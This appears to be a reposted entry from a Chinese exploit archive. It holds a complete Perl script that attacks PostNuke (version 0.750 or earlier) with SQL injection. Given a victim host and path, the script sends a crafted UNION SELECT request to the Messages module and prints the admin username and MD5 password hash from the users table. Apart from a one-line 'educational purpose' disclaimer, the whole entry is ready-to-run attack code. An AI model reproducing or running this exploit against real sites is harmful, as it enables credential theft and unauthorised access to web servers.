| 关键词: Injection print Socket host nbsp ARGV pn 20 Usage PostNuke |
Added by: SecureBit Date: 06.06.05 Time: 19:49:47 Category: Exploits Source: http://h4cky0u.tk/ #!/usr/bin/perl# This tools is only for educational purpose## Author: K-C0d3r a x0n3-h4ck friend !!! ## This exploit should give admin nick and md5 password##-=[ PostNuke SQL Injection version : x=> 0.750]=-#-=[ ]=-#-=[ Discovered by sp3x ]=-#-=[ Coded by K-C0d3r ]=- use IO::Socket; sub Usage {print STDERR \"Usage: KCpnuke-xpl.pl <www.victim.com> </path/to/modules.php>\\n\";exit;} if (@ARGV < 2){Usage();} if (@ARGV > 2){Usage();} if (@ARGV == 2){$host = @ARGV[0];$path = @ARGV[1]; print \"[K-C0d3r] PostNuke SQL Injection [x0n3-h4ck]\\n\";print \"[+] Connecting to $host\\n\"; $injection = \"$host\\/$path?\";$injection .= \"op=modload&name=Messages&file=readpmsg&start=0\";$injection .= \"%20UNION%20SELECT%20pn_uname,null,pn_uname,pn_pass,pn_pass,null,pn_pass,null\";$injection .= \"%20FROM%20pn_users%20WHERE%20pn_uid=2\\/*&total_messages=1\"; $socket = new IO::Socket::INET (PeerAddr => \"$host\",PeerPort => 80,Proto => \'tcp\');die unless $socket; print \"[+] Injecting command ...\\n\";print $socket \"GET http://$injection HTTP/1.1\\nHost: $host\\n\\n\";while (<$socket>){print $_;exit;}} |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|